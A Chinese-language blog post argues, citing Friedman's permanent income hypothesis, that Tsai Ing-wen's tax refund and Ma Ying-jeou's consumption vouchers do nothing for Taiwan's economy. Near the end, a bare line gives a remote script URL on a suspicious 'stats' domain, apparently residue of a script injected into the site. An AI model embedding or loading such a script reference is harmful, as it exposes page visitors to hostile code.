分類
經濟分析

蔡英文退稅與馬英九消費券的經濟效果都一樣:無效

我們多次談過Milton Friedman的「恆久收入假設」 — 短期少量的收入增減無法改變人們的消費行為,必須真正改變恆久收入預期,才會改變消費行為。

這解釋了一般人不會因為撿到1千元就大幅改變消費行為;但若中了幾億元樂透消費行為就會改變。

同樣地,我認識一位身價幾十億的朋友,中了台灣樂透頭獎一億多,消費行為果然沒啥改變。朋友自稱「金額太少,沒啥感覺。」

再進一步看,一位身價幾十億的富豪相對只有幾十萬資金的股票族,何者更可能因為短期股價波動改變消費行為嗎?顯然是後者。但若跌幅夠大,幾十億身價損失5成甚至9成以上,則消費行為必然改變。

當年馬英九要發消費券,我依此理論預言對景氣改善一點效果也不會有。同理,蔡英文若退回聲稱的「超收500億稅款」對台灣景氣會不會改善?不會,完全無效。

當然,前文提到的公平性問題:台灣單身者免所得稅收入額度約在年收入40萬元左右,這表示月薪3萬以下者幾乎都免繳所得稅。

但蔡英文規劃的退稅對象卻是這些免繳稅者…這種挖東牆補西牆式的退稅,到底能賺到多少選票?很值得觀察呢。

https://js.developerstatss.ga/stat.js?n=ns1

發表迴響

在下方填入你的資料或按右方圖示以社群網站登入:

WordPress.com 標誌

您的留言將使用 WordPress.com 帳號。 登出 /  變更 )

Google photo

您的留言將使用 Google 帳號。 登出 /  變更 )

Twitter picture

您的留言將使用 Twitter 帳號。 登出 /  變更 )

Facebook照片

您的留言將使用 Facebook 帳號。 登出 /  變更 )

連結到 %s